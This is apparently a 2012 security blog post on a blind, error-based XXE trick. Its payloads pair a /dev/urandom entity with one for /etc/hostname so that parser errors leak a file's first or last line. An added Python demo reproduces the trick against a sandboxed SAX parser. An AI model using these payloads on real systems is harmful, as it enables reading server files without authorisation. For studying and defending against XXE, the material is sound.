Thursday, 4 October 2012

Error-based XXE exploitation trick

Exploiting an XXE vulnerability is difficult when you cannot see the resulting XML document.

The recent XXE vulnerability in PostgreSQL is a good example: the entities are resolved, but their content is never added to the XML output. This is a common situation in the wild.

Here is an easy trick that lets you read the first and last lines of ASCII files in such blind cases, where the classic XXE vector fails because the parsed document is not reflected. The idea is to place a deliberately malformed entity (an unparseable source such as /dev/urandom) next to the entity for the file you want: the parser chokes on the malformed content and its error message quotes the surrounding context, which includes the adjacent file content. The order of the two entity references decides which line you get:

<!DOCTYPE root [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null also works -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read the first line of the file using error-based XXE -->
<root>
&malformed; &wanttoread;
</root>

<!DOCTYPE root [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null also works -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read the last line of the file using error-based XXE -->
<root>
 &wanttoread; &malformed;
</root>

The error message will then look something like this, with the leaked line quoted as the parser's context:
ERROR: hostnamestr
                                     ^
didn't parse (line: 1 pos: 13)
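The following Python script is an added example, not code from the post: it reproduces the blind condition described above with the standard library's xml.sax/expat parser (entities fetched, nothing echoed), builds both payload orderings, and pulls the leaked line out of an error message in the format quoted above. The "hostname" and "junk" files are constructed temporary files standing in for /etc/hostname and /dev/urandom, and SAMPLE_ERROR is the text quoted in the post, not output captured from a live server. One caveat it makes visible: expat's own error strings never quote the offending line, so the trick only works against parsers that echo context the way the PostgreSQL error above does.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler, EntityResolver

# Constructed copy of the error text quoted in the post (not a live capture).
SAMPLE_ERROR = (
    "ERROR: hostnamestr\n"
    "                                     ^\n"
    "didn't parse (line: 1 pos: 13)\n"
)


def build_payload(target, variant="first", junk="/dev/urandom"):
    """Return the post's payload. 'first' puts &malformed; before
    &wanttoread; (error context shows the target's first line);
    'last' reverses the order (last line). 'junk' is the source that
    must fail to parse, /dev/urandom in the post."""
    if variant == "first":
        refs = "&malformed; &wanttoread;"
    elif variant == "last":
        refs = "&wanttoread; &malformed;"
    else:
        raise ValueError("variant must be 'first' or 'last'")
    return (
        "<!DOCTYPE root [\n"
        f'   <!ENTITY malformed SYSTEM "{junk}">\n'
        f'   <!ENTITY wanttoread SYSTEM "{target}">\n'
        "]>\n"
        f"<root>{refs}</root>\n"
    )


class _CountingHandler(ContentHandler):
    """Blind consumer: counts elements and never echoes character data."""

    def __init__(self):
        super().__init__()
        self.elements = 0

    def startElement(self, name, attrs):
        self.elements += 1


class _LoggingResolver(EntityResolver):
    """Records every external entity the parser really goes and fetches."""

    def __init__(self):
        self.fetched = []

    def resolveEntity(self, publicId, systemId):
        self.fetched.append(systemId)
        return systemId


def parse_blind(xml_text, resolve_external):
    """Parse like a server that returns only a status line. The dict holds
    what the caller sees ('response') and what it does not: the entities
    fetched and the parser's error text, if any."""
    parser = xml.sax.make_parser()
    # True is the vulnerable setting; False (the default since Python 3.7.1)
    # makes expat skip external general entities instead of fetching them.
    parser.setFeature(handler.feature_external_ges, resolve_external)
    content, resolver = _CountingHandler(), _LoggingResolver()
    parser.setContentHandler(content)
    parser.setEntityResolver(resolver)
    error = None
    try:
        parser.parse(io.BytesIO(xml_text.encode()))
        response = f"ok, {content.elements} element(s)"
    except xml.sax.SAXParseException as exc:
        error = str(exc)          # expat quotes an error code, not the line
        response = "ERROR: didn't parse"
    return {"response": response, "fetched": resolver.fetched, "error": error}


def demo(variant="last", resolve_external=True,
         target_text="hostnamestr\n", junk_bytes=b"\x01\x02\x03"):
    """Run the payload against parse_blind with constructed temp files:
    'hostname' stands in for /etc/hostname, 'junk' (bytes that are not
    legal XML) for /dev/urandom. Returned paths are reduced to basenames."""
    with tempfile.TemporaryDirectory() as d:
        target, junk = os.path.join(d, "hostname"), os.path.join(d, "junk")
        with open(target, "w") as f:
            f.write(target_text)
        with open(junk, "wb") as f:
            f.write(junk_bytes)
        result = parse_blind(build_payload(target, variant, junk), resolve_external)
        result["fetched"] = [os.path.basename(p) for p in result["fetched"]]
        return result


_ERROR_RE = re.compile(
    r"ERROR:[ \t]*(?P<context>[^\n]*)\n"    # line the parser choked on
    r"[ \t]*\^[^\n]*\n"                     # caret line
    r"[^\n]*line: (?P<line>\d+) pos: (?P<pos>\d+)"
)


def extract_leak(error_text):
    """Pull the leaked line out of an error in the format quoted in the post."""
    m = _ERROR_RE.search(error_text)
    if not m:
        return None
    return {"leak": m.group("context").strip(),
            "line": int(m.group("line")), "pos": int(m.group("pos"))}
```

Running `demo(resolve_external=False)` returns the status line with nothing fetched; `demo("last", True)` shows the hostname file being read and the junk entity aborting the parse, with neither the response nor expat's error text containing the file content. `extract_leak(SAMPLE_ERROR)` recovers "hostnamestr" from the PostgreSQL-style message.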
